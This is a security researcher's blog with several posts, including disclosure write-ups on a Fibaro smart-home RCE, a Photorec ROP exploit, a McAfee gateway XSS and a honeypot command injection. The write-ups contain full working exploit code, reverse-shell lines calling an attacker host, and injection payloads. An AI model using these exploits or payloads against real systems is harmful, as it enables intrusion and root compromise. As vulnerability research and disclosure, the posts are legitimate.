forsec

Building: Did someone clone me?

2022-07-13T00:00:00+00:00

Last months I’ve been working on a new project called didsomeoneclone.me. Last years I’ve been analyzing many phishing websites for fun. During those analysis I realized that many companies could improve on detecting clones of their websites. Techniques are available and even not hard to implement, but often not used.

The goal of did someone clone me is to:

A free service that notifies its users when their website is cloned and used in a phishing attack. This allows them to be aware of the attacks and brand abuse, but also take necessary mitigations such as initiating a takedown or investigating the phishing site.

A video explaining the concept:

Why?

First of all, I do think that detecting clones of a website can help fight phishing. Phishing is a huge problem nowadays. It helps you to take necessary steps such as initiating a takedown, informing users / customers and performing investigation. Also, it doesn’t hurt to implement this. Hopefully your website never gets cloned so you will not receive any notifications. But if it does, you will get notified. Doesn’t that feel good?

Next to this I just like to build stuff. Preferaly with the newest technologies, just to learn the newest things. Important in breaking stuff ;-).

How was it built?

While brainstorming on how to built this, I found some things important:

no maintenance
low costs

Maintainance, I don’t like. Especially because this is a side project. I want to build it and it needs to keep running .. :-). I decided to use cloud services, they offer amazing techniques to built services on and often with lower costs.

Azure Functions and Tables

The core of did someone clone me consists of two Azure Function. I really like Azure Function because they are serverless. It’s essentially a Python script (or other language) running in the cloud. Microsoft maintaince all servers that will run your Python script. It scales up the required resources automatically. Also, you only pay Microsoft when your script executes.

API

The service requires users to register with their domain and e-mail address on a website. The didsomeoneclone.me website uses this API to allow users to register. Also e-mail confirmation go through this API. The data (e-mail and domain) are stored in Azure Tables, which is a NoSQL datastore.

Callback

Another function is used as the “callback” function. Did someone clone me requires a registered user to add a link to their website (HTML/JS examples can be found here). The link points to this Azure Function. It contains all logic to detect if a request was originated from the real users website or a phishing site.

CI/CD

This was something new to me. Azure Functions integrate flawless with Github. When new code is pushed to Github, its automatically deployed to a Azure Function:

when pushing to the Github ‘develop’ branch, the code is deployed in a test environment
when pushing to the Github ‘master’ branch, the code is deployed to production

No manual deployment anymore ❤️

Github Pages

I really like Github pages. Its a way to host a website / frontend for free. Also, its static: which means its hard to hack. In the end its just a bunch of generated HTML and JavaScript code. The frontend didsomeoneclone.me is based on Github pages, it calls the earlier mentioned Azure Function API’s through JavaScript. The source code is available here, please don’t clone it… ;-) The frontend:

Sendgrid

Did someone clone me requires sending e-mails for confirming the e-mail address and sending notifications. I didn’t want to spend to many time on building e-mail templates. Sendgrid offers an easy to use e-mail designer. Also, it doesn’t require any maintaince and e-mails can be easily send through Python (aka the Azure Functions)! A mail example:

Cloudflare

Its not necessary, but they offer great services that might be useful when the project grows.

Conclusion

Hopefully other people also see the benefit of implementing did someone clone me and start using it. Otherwise, it was fun to build and I’ve learned new stuff!

Creating a ProtonVPN wireless network

2020-08-07T00:00:00+00:00

Sometimes I prefer to encrypt my connection or hide my IP-address. During Black Friday I bought a ProtonVPN Plus account which allows me to switch IP-addresses and countries easily. At home I’m using a network based on Ubiquiti hardware <3. I already have quite some network configuration such as different VLANs to protect devices from each other, for example I separated all my home automation from the other devices.

Adding a separate wireless network that automatically tunnels all my traffic through ProtonVPN is on my wishlist for quite a while. That would allow me to seperate my research devices from other devices and hide my home IP-address at the same time.

So the first thing I do of course is: Googling. I found some information on how to configure ProtonVPN on the Ubiquiti USG itself, however this required modifications on the CLI. Which I didn’t like, I will brick my network for sure. I want to keep that part clean as its working great.

Another approach

I decided to take another approach. In my network there is also an Intel NUC with ESX running with a lot space left for virtual machines. I added a Ubuntu VM (20.04) to the NUC that will be a ProtonVPN router. The idea is: passing all traffic through this box, which then passes in onto the ProtonVPN tunnel.

Steps

After installing the virtual machine on my ESX, I modified the DHCP settings in my Ubiquiti USG. I modified the ‘default gateway’ to the IP-address of the Ubuntu virtual machine, for example 192.168.1.2. We want this default gateway to be assigned to all the clients on the wireless network.

On the Ubuntu VM add the following line to /etc/sysctl.conf, this allows traffic being routed through the VM:

net.ipv4.ip_forward=1

Install ProtonVPN on the Ubuntu box with these commands:

sudo apt install -y openvpn dialog python3-pip python3-setuptools
sudo pip3 install protonvpn-cli

Initialize the configuration, walk through the steps by filling in your ProtonVPN details:

sudo protonvpn init

Lets do some additional configuration. One thing I noticed is that whenever a connection is established with ProtonVPN, I’m not able to SSH in the box anymore due to the added routes. To prevent this, we configure split tunneling through the following command. Choose the option split tunneling and set it for the subnet where your Ubuntu VM is located, e.g. 192.168.1.1/24:

protonvpn configure

Now its time for the last step: using IP tables to forward all the traffic from the clients through the ProtonVPN tunnel. In order to do so I created a bash script which I run on a reboot of the VM. This initializes the VPN connection and configures IP tables to route all traffic through the ProtonVPN connection:

sudo protonvpn c
sudo iptables -t nat -A POSTROUTING -o proton0 -j MASQUERADE
sudo iptables -A FORWARD -i proton0 -o ens160 -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A FORWARD -i ens160 -o proton0 -j ACCEPT

To prevent DNS leaks, we configure the ProtonVPN DNS-server. Modify the DHCP-server settings (in my case Ubiquiti USG), to use the following DNS-server:

10.50.0.1

If everything went fine, all your clients traffic should be routed through the ProtonVPN tunnel. Use the website ipleak.net to verify if everything is working as expected.

Msfenum: automation of MSF auxiliary modules

2018-07-06T09:58:40+00:00

Low hanging fruit scans can be very useful when performing a penetration test. Especially when performing a internal penetration test a low hanging fruit scan can be very effective. Usually when performing a internal penetration test I am using among other things the Metasploit auxiliary modules to quickly enumerate the network. The modules can give some interesting findings very quickly, such as:

open SMB/NFS shares;
End-of-life systems, such as Windows XP & Windows 2003 server;
MS17-010 vulnerable systems.

Those findings are quick wins and can give you an entry point to the network in order to escalate privileges (e.g. MS17-010 -> DA creds) pretty fast. This helps to tell your customer that you were able to obtain high network permissions within a few hours (if you are able, a malicious attacker is able as well).

Automating these steps would be useful to give us a quick initial view of a client network. Allowing us more time for more manual validation steps. Next to this we can use this to standardize some of the pentesters workflow to make sure all team members perform the same baseline checks.

Writing a tool called ‘msfenum’

Metasploit makes it pretty easy to run those auxiliary modules, however I was looking for a way to make this even faster (plug into the network and run all the modules). I was thinking about writing a tool to automate this, which only needs an IP-range to be scanned. I shared my idea with @rikvduijn, he got pretty enthusiastic about the idea. He got an idea on how to structure this tool and started writing the skeleton the same night :-).

The next day I looked into the thing that he wrote, the skeleton was a nice start to create a tiny, modular system to run those auxiliary modules automatically. So I continued on that skeleton improve it. Also one of my other collegeaus @Ag0s_, started writing some cool additions / improvements in msfenum. 🙂

Running msfenum

The usage of msfenum is very simple. Use a Linux system with Metasploit Framework installed, such as Kali. Clone the github page:

git clone https://github.com/wez3/msfenum

Run the command (TARGET_FILE is a file with IPs/IP-ranges line by line):

python msfenum.py TARGET_FILE -t <numberofthreads>

After running msfenum, all auxiliary output history is stored in the “logs/” folder in separate files per module. Also, a summary is printed by the tool after it completed:

Adding a module

A nice thing about the skeleton is that the scripts exists of a very simple structure on how to add auxiliary modules. This requires the following:

config file

There is a config file present. Here the modules you like to add can be defined in the “modules” entry.

modules folder

After adding it to the config file, a module file needs to be created in the “modules/” folder. Create a new file with the name of the modules (value after the last “/”, e.g. smb_version). Add the specific RC commands to run for your newly added module.

Contribution

That’s it. The module is added. The modules system was created in the hope, other people, with useful auxiliary scans can commit the useful scans back on the Github page. This way, we can help each other to improve (internal) penetration tests :-).

Some possible additions for the future are:

parsing the MSF output logs to show results in a standardised way;
new modules!

Smart home: remote command execution (RCE)

2017-09-27T07:15:59+00:00

During my spare time I am playing around with smart home/domotica/internet of things hardware and software. A while ago I decided to take a look at the security of these solutions, just because I was curious and because it’s fun. Within this research only smart home controllers were investigated. The controllers are the brain within a smart home, whenever an attacker gains access to this component, he is able to control the complete smart home.

I’ve reported some vulnerabilities to the developer of the open-source project Domoticz. The developer fixed issues quickly and I’ve also commited some code for the bug fixes myself:

Next to the open-source product I decided to investigate commercial products. One of these products was the Fibaro Home Center 2. During this research I stumbled on a critical vulnerability that allows an attacker to take full control (root access) on a Fibaro Home Center 2 and Fibaro Home Center Lite device whenever the web interface is accessible.

The video below shows an Fibaro Home Center 2 being exploited :):

Opening the case

I borrowed an Fibaro Home Center 2 (HC2) from one of my colleagues (thanks Martijn Teelen!). The Fibaro HC2 is just an x86 computer in a fancy case. The operating system was running on a USB-stick, another USB-stick was present as recovery.

After opening the case I created disk images (dd) of the USB-sticks present in the Fibaro HC2. Now the cool things starts, digging into the internal system to understand how it works and to find a critical vulnerability.

Searching for a critical vulnerability

The PHP files of the web application were partially encoded with ionCube. After searching a tool was found that makes the decoding of the PHP files pretty easy. After decoding I stumbled upon a file (liliSetDeviceCommand.php) that performs a PHP system call using POST-input values, without checking for authentication and/or validating the input correctly.

In order to test whether the vulnerability was exploitable, I injected`ping${IFS}8.8.8.8` into the “cmd1” parameter:

A htop showed that the command was successfully injected:

At this point it was verified that it is possible to gain command execution. However, the privileges were still limited to the www-data user because of the backticks being used as injection. Backticks were required because an addslashes was performed on the input.

Privilege escalation

Looking into the /etc/sudoers showed that the www-data user has permissions to run a couple of binaries under root privileges:

Note the “/usr/bin/update” binary. After investigating this binary it became clear that this binary can be used to “manually” install an update. In order to do this an .tar.gz file needs be passed when calling this binary. The. tar.gz needs to contain a “run.sh”, this file contains the commands used in a update to perform update actions, such as copying files. So, lets try to put an reverse shell within this run.sh file, will we obtain a reverse shell under root privileges? During manual testing it became clear that this works.

Writing the exploit

Now a (quick and dirty) exploit was written chaining the remote command execution and the privilege escalation together, see the code below (tested on Home Center 2):

#!/usr/bin/python

import requests
import argparse
import urllib
import base64
import tarfile
import os

parser = argparse.ArgumentParser(description='Fibaro RCE')
parser.add_argument('--rhost')
parser.add_argument('--lhost')
parser.add_argument('--lport')
args = parser.parse_args()

f = open('run.sh', 'w')
f.write('#!/bin/bash\n')
f.write('/bin/bash -i &gt;& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0&gt;&1\n')
f.close()

os.chmod('run.sh', 0777)

tar = tarfile.open("root.tar.gz", "w:gz")
tar.add("run.sh")
tar.close()

with open("root.tar.gz", "rb") as tarfile:
tar64 = base64.b64encode(tarfile.read())

wwwexec = urllib.quote_plus(base64.b64encode("echo '" + tar64 + "' | base64 -d &gt; /tmp/patch.tar.gz && sudo update --manual /tmp/patch.tar.gz"))

os.remove('run.sh')
os.remove('root.tar.gz')

headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Fibaro-Version': '2',
'X-Requested-With': 'XMLHttpRequest',
}

data = 'deviceID=1&deviceName=&deviceType=&cmd1=`echo${IFS}' + wwwexec + '|base64${IFS}-d|/bin/bash`&cmd2=&roomID=1&roomName=&sectionID=&sectionName=&lang=en'
print "[+] Popping a root shell..."

requests.post('http://' + args.rhost + '/services/liliSetDeviceCommand.php', headers=headers, data=data, verify=False)

Responsible disclosure

I’ve reported above described vulnerabilities to Fibaro. I tried to contact Fibaro multiple times and first came in contact with an employee that did not give the discovered vulnerability the priority it deserved. The employee communicated that the issue was being fixed by developers, however after 100+ days the vulnerability was still not fixed. This was frustrating, however I kept trying contacting employees of Fibaro. This is a timeline of the responsible disclosure report:

22/02/2017: Reported the vulnerability.
01/03/2017: Employee asked to verify whether the bug was fixed. Checked and it was not fixed.
02/03/2017: Employee communicated that the vulnerability is being fixed right now.
08/05/2017: Verified the newest firmware. Vulnerability still present, communicated this to the contact person. No reply.
15/06/2017: Verified the newest firmware. Vulnerability still present, communicated that I will post my findings in a blog. No reply.
20/06/2017: Contacted management employee of Fibaro through LinkedIn, replies directly.
21/06/2017: Technical employee contacting me that an fix is being implemented.
23/06/2017: Decided to sent my exploit and video to make sure everything is clear to the technical employee.
28/06/2017: Vulnerability fixed, technical employee asked to verify the patch.
03/07/2017: Patch received from Fibaro.
04/07/2017: Verified that the patch fixes the RCE vulnerability.
05/07/2017: Technical and management employees are happy with my findings and decide to send me a gift 🙂
14/09/2017: Patch released.

After contacting other employees (a management employee) through LinkedIn I came in contact with an technical enthusiastic employee of Fibaro, from there the problem was picked up very adequate and the vulnerability was solved. I supported Fibaro on verifying their patch for the vulnerability, they repeated multiple times that my support was really appreciated :).

They even sent me an awesome gift (thanks Fibaro):

I recommended Fibaro to add an responsible disclosure on their website, with an e-mailaddress to contact in case of an security vulnerability. This can save frustration of other security researchers in the future :).

Conclusion

For Fibaro users, install the new Fibaro update 4.140 to patch the vulnerability. For all domotica users, be aware of the risks when connecting internet of things devices directly onto the internet. Next to the above exploit example, I discovered lots of internet of things devices connected onto the internet using Shodan. It is possible to connect to these devices to read and/or control them. If remote management of internet of things devices is required, it is wise to disclose them using an VPN-server. Also I would like to recommend network segmentation whenever implementing Domotica devices onto your local network, implement a DMZ (for internet-facing devices) and/or Domotica VLAN to seperate the devices from the regular network.

UPDATE 10 October 2017

How cool! Received an unannounced gift from Fibaro after blogging my findings. This is much appreciated. Thanks Fibaro!

UPDATE 15 November 2017

Really cool! Received a gift from the guys behind the open-source project Domoticz for reporting (and solving some) vulnerabilities. Thanks!

Exploiting the forensic investigator (AWE course training)

2016-06-07T17:42:31+00:00

This summer i am attending the Advanced Windows Exploitation (AWE) course of Offensive Security. The AWE course has been on my wishlist for a long time, because the previous courses (OSCP and OSCE) were amazing. One of the requirements for the AWE course, according to offsec, is a will to suffer intensely.

After completing OSCE, i’ve spend quite some time on exploit development. My thesis was to discover previously unknown vulnerabilities and exploit them. During this thesis i discovered a vulnerability in Wireshark (CVE-2014-2299).

However, this is around three years ago. To get ready for the AWE course, i really have to refresh my exploit development skills. So far, i wrote the following exploits to get ready for AWE:

EasyToMp3 – basic buffer overflow
The Offsec AWE challenge (very cool, they sent you a challenge to make sure you have the minimal knowledge)
Wireshark – basic buffer overflow
Wireshark – bypassing ASLR/DEP on Windows XP

After the Wireshark exploit i wanted to continue exercising writing exploits. However, rewriting known exploits is quite boring. Therefor i decided to search for a publicly known vulnerability, without a publicly available exploit.

Photorec

During my search i came across a vulnerability in Photorec 6.14, which is shipped with Testdisk. The vulnerability was discovered by Denis Andzakovic. Photorec is a data carving tool which can be used to carve files from disk images. The utility is commonly used in digital forensic investigations to restore deleted files from a hard drive. The vulnerability could allow a criminal to prepare his/her disks in order to exploit the forensic tooling to get a hint that his data is being looked at or get an actual shell on the investigators system. The latter would allow the criminal to manipulate the evidence. There is an update available for Photorec that fixed the vulnerability (version 7.0). For the forensics it is important to make sure that they are using this version.

I decided to write a exploit for the vulnerability in Photorec 6.14. The target system is a Windows 7 machine, with ASLR and DEP enabled. The exploit writes an malicious image file to disk. When opening this image file with the “photorec_win.exe” executable, the following Windows appears:

After selecting the image by clicking “Proceed”, the vulnerability gets triggered. The shellcode is executed, for example a shell can be obtained on the system that opens the image file:

After some time of development, the final exploit code looks like this:

#!/usr/bin/python
# Author: forsec.nl
# Tested on: Windows 7 Professional (x86) SP1 ASLR + DEP bypass

import struct

def p(x):
    return struct.pack('&lt;L', x)

# msfvenom -p windows/exec CMD=calc.exe EXITFUNC=seh -f python -b \x00
shellcode = ""
shellcode += "\xba\xbd\xcc\x42\xc6\xda\xdf\xd9\x74\x24\xf4\x5f\x33"
shellcode += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\xb2\x2e"
shellcode += "\xb7\x3a\x24\x2c\x38\xc3\xb4\x51\xb0\x26\x85\x51\xa6"
shellcode += "\x23\xb5\x61\xac\x66\x39\x09\xe0\x92\xca\x7f\x2d\x94"
shellcode += "\x7b\x35\x0b\x9b\x7c\x66\x6f\xba\xfe\x75\xbc\x1c\x3f"
shellcode += "\xb6\xb1\x5d\x78\xab\x38\x0f\xd1\xa7\xef\xa0\x56\xfd"
shellcode += "\x33\x4a\x24\x13\x34\xaf\xfc\x12\x15\x7e\x77\x4d\xb5"
shellcode += "\x80\x54\xe5\xfc\x9a\xb9\xc0\xb7\x11\x09\xbe\x49\xf0"
shellcode += "\x40\x3f\xe5\x3d\x6d\xb2\xf7\x7a\x49\x2d\x82\x72\xaa"
shellcode += "\xd0\x95\x40\xd1\x0e\x13\x53\x71\xc4\x83\xbf\x80\x09"
shellcode += "\x55\x4b\x8e\xe6\x11\x13\x92\xf9\xf6\x2f\xae\x72\xf9"
shellcode += "\xff\x27\xc0\xde\xdb\x6c\x92\x7f\x7d\xc8\x75\x7f\x9d"
shellcode += "\xb3\x2a\x25\xd5\x59\x3e\x54\xb4\x37\xc1\xea\xc2\x75"
shellcode += "\xc1\xf4\xcc\x29\xaa\xc5\x47\xa6\xad\xd9\x8d\x83\x4c"
shellcode += "\x2b\x1c\x19\xd8\x92\xf5\x60\x84\x24\x20\xa6\xb1\xa6"
shellcode += "\xc1\x56\x46\xb6\xa3\x53\x02\x70\x5f\x29\x1b\x15\x5f"
shellcode += "\x9e\x1c\x3c\x3c\x41\x8f\xdc\xed\xe4\x37\x46\xf2"

# Virtualprotect function
params = "XXXX" # virtualprotect address
params += "UUUU" # shellcode address
params += "IIII" # shellcode address
params += "WWWW" # size (0x700)
params += "YYYY" # executable (0x40)
params += "PPPP" # writable address

# EAX == mainly used for calculations reg
# ECX == stack mov dword pointer
# EDX == used to pop static sub/add values in

# Retrieve the current stack position
rop_chain = p(0x0045cdde) # 0x0045cdde : # PUSH ESP # POP EBP # RETN
rop_chain += p(0x005ac103) # 0x005ac103 (RVA : 0x001ac103) : # POP ECX # RETN ** [photorec_win.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain += p(0x0)
rop_chain += p(0x61060893) # 0x61060893 (RVA : 0x00060893) : # ADD ECX,EBP # RETN ** [cygwin1.dll] ** | {PAGE_EXECUTE_READ}
rop_chain += p(0x005e0400) # 0x005e0400 : # POP EDX # RETN ** [photorec_win.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain += p(0x20)
rop_chain += p(0x6113ab15) # 0x6113ab15 : # SUB ECX,EDX # MOV EAX,ECX # POP EBP # RETN ** [cygwin1.dll] ** | {PAGE_EXECUTE_READ}
rop_chain += p(0x41414141)

# Dynamic virtualprotect address
rop_chain += p(0x6113b484) # 0x6113b484 (RVA : 0x0013b484) : # MOV EAX,ECX # POP EBP # RETN ** [cygwin1.dll] ** | {PAGE_EXECUTE_READ}
rop_chain += p(0x41414141)
rop_chain += p(0x005e0400) # 0x005e0400 : # POP EDX # RETN ** [photorec_win.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain += p(0x55A8)
rop_chain += p(0x6112e342) # 0x6112e342 (RVA : 0x0012e342) : # ADD EAX,EDX # RETN ** [cygwin1.dll] ** | {PAGE_EXECUTE_READ}
rop_chain += p(0x611001d9) # 0x611001d9 : # MOV EAX,DWORD PTR [EAX] # RETN ** [cygwin1.dll] ** | {PAGE_EXECUTE_READ}
rop_chain += p(0x005e0400) # 0x005e0400 : # POP EDX # RETN ** [photorec_win.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain += p(0x51B6D)
rop_chain += p(0x6112952e) # 0x6112952e : # SUB EAX,EDX # RETN ** [cygwin1.dll] ** | {PAGE_EXECUTE_READ}
rop_chain += p(0x61027919) # 0x61027919 : # MOV DWORD PTR [ECX],EAX # RETN ** [cygwin1.dll] ** | ascii {PAGE_EXECUTE_READ}

# ROP chain first param
rop_chain += p(0x006a27ff)*4 # 0x006a27ff (RVA : 0x002a27ff) : # INC ECX # RETN ** [photorec_win.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain += p(0x6113b484) # 0x6113b484 (RVA : 0x0013b484) : # MOV EAX,ECX # POP EBP # RETN ** [cygwin1.dll] ** | {PAGE_EXECUTE_READ}
rop_chain += p(0x41414141)
rop_chain += p(0x005e0400) # 0x005e0400 : # POP EDX # RETN ** [photorec_win.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain += p(0x184)
rop_chain += p(0x611294e9) # 0x611294e9 : # ADD EAX,EDX # RETN ** [cygwin1.dll] ** | {PAGE_EXECUTE_READ}
rop_chain += p(0x61027919) # 0x61027919 : # MOV DWORD PTR [ECX],EAX # RETN ** [cygwin1.dll] ** | ascii {PAGE_EXECUTE_READ}

# Second param
rop_chain += p(0x006a27ff)*4 # 0x006a27ff (RVA : 0x002a27ff) : # INC ECX # RETN ** [photorec_win.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain += p(0x61027919) # 0x61027919 : # MOV DWORD PTR [ECX],EAX # RETN ** [cygwin1.dll] ** | ascii {PAGE_EXECUTE_READ}

# Third param
rop_chain += p(0x006a27ff)*4 # 0x006a27ff (RVA : 0x002a27ff) : # INC ECX # RETN ** [photorec_win.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain += p(0x005e0290) # 0x005e0290 : # POP EAX # RETN ** [photorec_win.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain += p(0x1000)
rop_chain += p(0x61027919) # 0x61027919 : # MOV DWORD PTR [ECX],EAX # RETN ** [cygwin1.dll] ** | ascii {PAGE_EXECUTE_READ}

# Fourth param
rop_chain += p(0x006a27ff)*4 # 0x006a27ff (RVA : 0x002a27ff) : # INC ECX # RETN ** [photorec_win.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain += p(0x005e0290) # 0x005e0290 : # POP EAX # RETN ** [photorec_win.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain += p(0x40)
rop_chain += p(0x61027919) # 0x61027919 : # MOV DWORD PTR [ECX],EAX # RETN ** [cygwin1.dll] ** | ascii {PAGE_EXECUTE_READ}

# Writable address
rop_chain += p(0x006a27ff)*4 # 0x006a27ff (RVA : 0x002a27ff) : # INC ECX # RETN ** [photorec_win.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain += p(0x00549b76) # 0x00549b76 : # MOV EAX,ECX # POP EBX # RETN ** [photorec_win.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain += p(0x41414141)
rop_chain += p(0x005e0400) # 0x005e0400 : # POP EDX # RETN ** [photorec_win.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain += p(0x368)
rop_chain += p(0x611294e9) # 0x611294e9 : # ADD EAX,EDX # RETN ** [cygwin1.dll] ** | {PAGE_EXECUTE_READ}
rop_chain += p(0x61027919) # 0x61027919 : # MOV DWORD PTR [ECX],EAX # RETN ** [cygwin1.dll] ** | ascii {PAGE_EXECUTE_READ}

# JMP to Virtualprotect
rop_chain += p(0x005e0400) # 0x005e0400 : # POP EDX # RETN ** [photorec_win.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain += p(0x10)
rop_chain += p(0x6113ab15) # 0x6113ab15 : # SUB ECX,EDX # MOV EAX,ECX # POP EBP # RETN ** [cygwin1.dll] ** | {PAGE_EXECUTE_READ}
rop_chain += p(0x45454545)
rop_chain += p(0x61133291) # 0x61133291 (RVA : 0x00133291) : # XCHG EAX,ESP # RETN ** [cygwin1.dll] ** | {PAGE_EXECUTE_READ}

eip = "42390361" # 0x61033942 ADD ESP,20 # RETN [cygwin1.dll]
img = "eb3c906d6b646f776673000008048e000100008010f8010001000100000000eb3c906d6b6400298f6262ed20202020202020202020204641542020202020202046415431322020200e1fbe5b7cac22c0740bf032e4cd1ecd19ebfe54686973206973206e6f74206120626f6f7461626c65206469736b2e2020506c6561736520696e73657274206120626f6f7461626c6520666c6f70707920616e640d0a707265737320616e79206b657920746f2074727920616761696e202e2e2e400d0a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000eeffff7fff000000000000000000000000000000000000000000000000d6d6d6d6d6d6d6d6d6d6d6d6d6d6d6d6d6d6d6d6d6d6d6d6d6d6d6d6d6d6000000000000fee000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000ff0fffe9000000e60040000000000000001e0000000000000000000000f40000000000e4fdf2ffff0000000000000000001000ff000000000000000000000000000000800000000504ff0000000000000000edf70000008000000000000000000005000000000000000023000000008000fff300000000040000000000000000000000ff0000f8ff001700000000009685858580ff000000000000000055aa00000000000000298f6262ed" + eip
junk_before_params = "\x90" * 4
junk_after_params = "\x90" * 4
junk_before_shellcode = "\x90" * (364-len(rop_chain))
junk_after_shellcode = "\x90" * (500-len(shellcode))
writable_area = "W" * 3000

final_img = img.decode('hex') + junk_before_params + params + junk_after_params + rop_chain + junk_before_shellcode + shellcode + junk_after_shellcode + writable_area
f = open("disk.img", "wb")
f.write(final_img)
f.close()

print "Disk image written"

Some technical explanation on the exploit (using line numbers):

#106 The image requirements are prepared that triggers the vulnerability.
#30 The Virtualprotect placeholders are defined on the stack.
#105 Jump to the beginning of the ROP chain (#43)
#42 Retrieve the current stack pointer and calculate the address of the Virtualprotect placeholders on the stack
#52 Calculate the Virtualprotect address dynamically by using an existing kernel32 call on the stack. Place it on the placeholder at #31.
#64 Calculate the shellcode address and place it on the placeholder at #32
#73 Place the shellcode address also at the placeholder at #33
#77 Place the value 0x1000 (size) on the placeholder at #34
#83 Place the value 0x40 (executable) on the placeholder at #35
#89 Calculate a writable address, place it on the placeholder at #36
#99 Jump to Virtualprotect which executes the shellcode, because all requirements are satisfied for Virtualprotect in order to work.

I am really looking forward for the AWE course. My intention is to write a AWE course review after the course. See you at Blackhat && Defcon!

How a spamfilter can help you to drop a shell

2016-04-26T15:13:00+00:00

A while ago i discovered a cross-site scripting vulnerability (XSS) in the McAfee E-mail Gateway (MEG) 7.6.4. I reported this vulnerability to McAfee, they fixed it within a few months. The security advisory can be found over here. MEG is an application that can be used to filter out malicious attachments from e-mails, however due to the vulnerability an attacker is able to abuse this functionality to drop a malicious file.

The McAfee E-mail Gateway is replacing a malicious file with a warning HTML-file (1_warning.html). I saw that this HTML-file is displaying the filename of the replaced malicious file (e.g. malicious.xlsx). This made me curious, I decided to check whether it was possible to use this filename to perform a cross-site scripting attack because it was used within HTML-context.

In order to check whether the XSS was present, i created a malicious Excel document. The file needs to be malicious in order to be replaced by the McAfee E-mail Gateway. The file was named “file<IMG SRC=x onerror=”alert(‘XSS’)”>jem.xls“. I e-mailed this file to a e-mailbox that was protected by McAfee E-mail Gateway. When opening the warning HTML-file, the following behavior became clear:

Together with @rikvduijn i decided to abuse this issue further in order to pop a shell on a target , with some user interaction. The XSS attack can be used to redirect a victim to a malicious website. We decided to use HTA-files, these files can be generated using the awesome Unicorn script. By performing a document.location on the victims computer, pointed to the HTA-file, our victim should get a popup with the question to open the HTA-file.

After trying, we achieved the redirect with the following filename (replace 99,99,99… with charcodes for URL):

file<IMG SRC=x onerror=document.location(String.fromCharCode(99,99,99,99,99,99,99,99,99,99,99,99,99,99))>jem.xls

The filename was changed and the document was send again to the victim, and the popup appeared!

When the victim opens the file, his computer runs a reverse https meterpreter backdoor. Thank you e-mail filter :-).

Compromising a honeypot network through the Kippo password when logstash exec is used

2015-08-22T10:59:08+00:00

This is a shared post by @rikvduijn and @wesleyneelen.

We have been playing with Honeypots lately (shoutout to Theo and Sebastian for adding their honeypots to the network), collecting and visualizing the data from the honeypots is done via ELK. The environment contains a central server to centralize all the collected data from the honeypots that are connected to it. The environment is visualized in the following diagram:

In order to collect interesting data on Dutch IP’s we run every event through a filter adding Geo location based on IP. After that we run all events that pertain to Dutch IP’s through a Python script using the logstash function exec.

Wesley had a bad feeling about passing input of the honeypots from Logstash to Python, there was no sanitation. The following line is an example of how the input data is passed to the exec:

function:
exec {
  command => "/usr/bin/python /opt/logstash/scripts/main.py '%{clientIP}' '%{message}' >> /opt/logstash/scripts/script.log"<br />
}

Rik had the feeling that all “evil” input from the honeypots would be nicely encapsulated in JSON. What Rik did not think trough is that characters in JSON have a different locution than on the commandline. In order to figure out how the input was used we chose to test it. First just from the commandline, calling python with the raw event data from logstash.

python main.py '127.0.0.1' '{"message":"{\"peerIP\": \"xx.245.xx.204\", \"commands\": [], \"loggedin\": null, \"version\": \"SSH-2.0-libssh2_1.4.1\", \"ttylog\": null, \"urls\": [], \"hostIP\": \"127.0.0.1\", \"peerPort\": 39277, \"session\": \"e8dba2e567e34f84b983e8f65810fd54\", \"startTime\": \"2015-08-05T23:27:07.407834\", \"hostPort\": 22, \"credentials\": [[\"nickname\", \"nickname\"], [\"name\", \"name\"]], \"endTime\": \"2015-08-05T23:27:10.215302\", \"unknownCommands\": []}","@version":"1","@timestamp":"2015-08-05T21:27:09.671Z","host":"localhost","chan":"kippo.sessions","name":"cc82a86a-3491-11e5-8589-000c29e0a40d","peerIP":"xx.245.xx.204","commands":[],"loggedin":null,"version":"SSH-2.0-libssh2_1.4.1","ttylog":null,"urls":[],"hostIP":"127.0.0.1","peerPort":39277,"session":"e8dba2e567e34f84b983e8f65810fd54","startTime":"2015-08-05T23:27:07.407834","hostPort":22,"credentials":[["nickname","nickname"],["name","name"]],"endTime":"2015-08-05T23:27:10.215302","unknownCommands":[],"geoip":{"ip":"xx.245.xxx.204","country_code2":"US","country_code3":"USA","country_name":"United States","continent_code":"NA","region_name":"PA","city_name":"Glenshaw","postal_code":"15116","latitude":40.54700000000006,"longitude":-79.988,"dma_code":508,"area_code":412,"timezone":"America/New_York","real_region_name":"Pennsylvania","location":[-79.988,40.54700000000006],"coordinates":[-79.988,40.54700000000006]},"validatedIP":"xx.245.xx.204","valid_ip":"true"}'

Adding a text to commands should allow us to test if it is vulnerable. We chose to add ‘; touch /tmp/testing# as expected this worked. Now we need to do this via a honeypot. We chose Kippo because this allowed us the most input. Filling in the command seemed harder than expected, kippo did not like the input and did not log it to our central server. We hoped kippo would log our input under “unknownCommands” but this failed.

After a while we thought what does kippo log every time no matter what: username and password. Supplying the password ‘; touch /tmp/testing# we expected a file in tmp. Finding temp with no new file was dissapointing and it was lucky we looked under / finding a file “tmp, testing” created by the root user! We now knew that command injection via a honeypot into our ELK host was possible and with root privileges to boot. However Logstash converted our slashes to comma’s and we do need comma’s for something like “nc 192.168.1.1 1234 -e /bin/bash”. We decided to use base64.

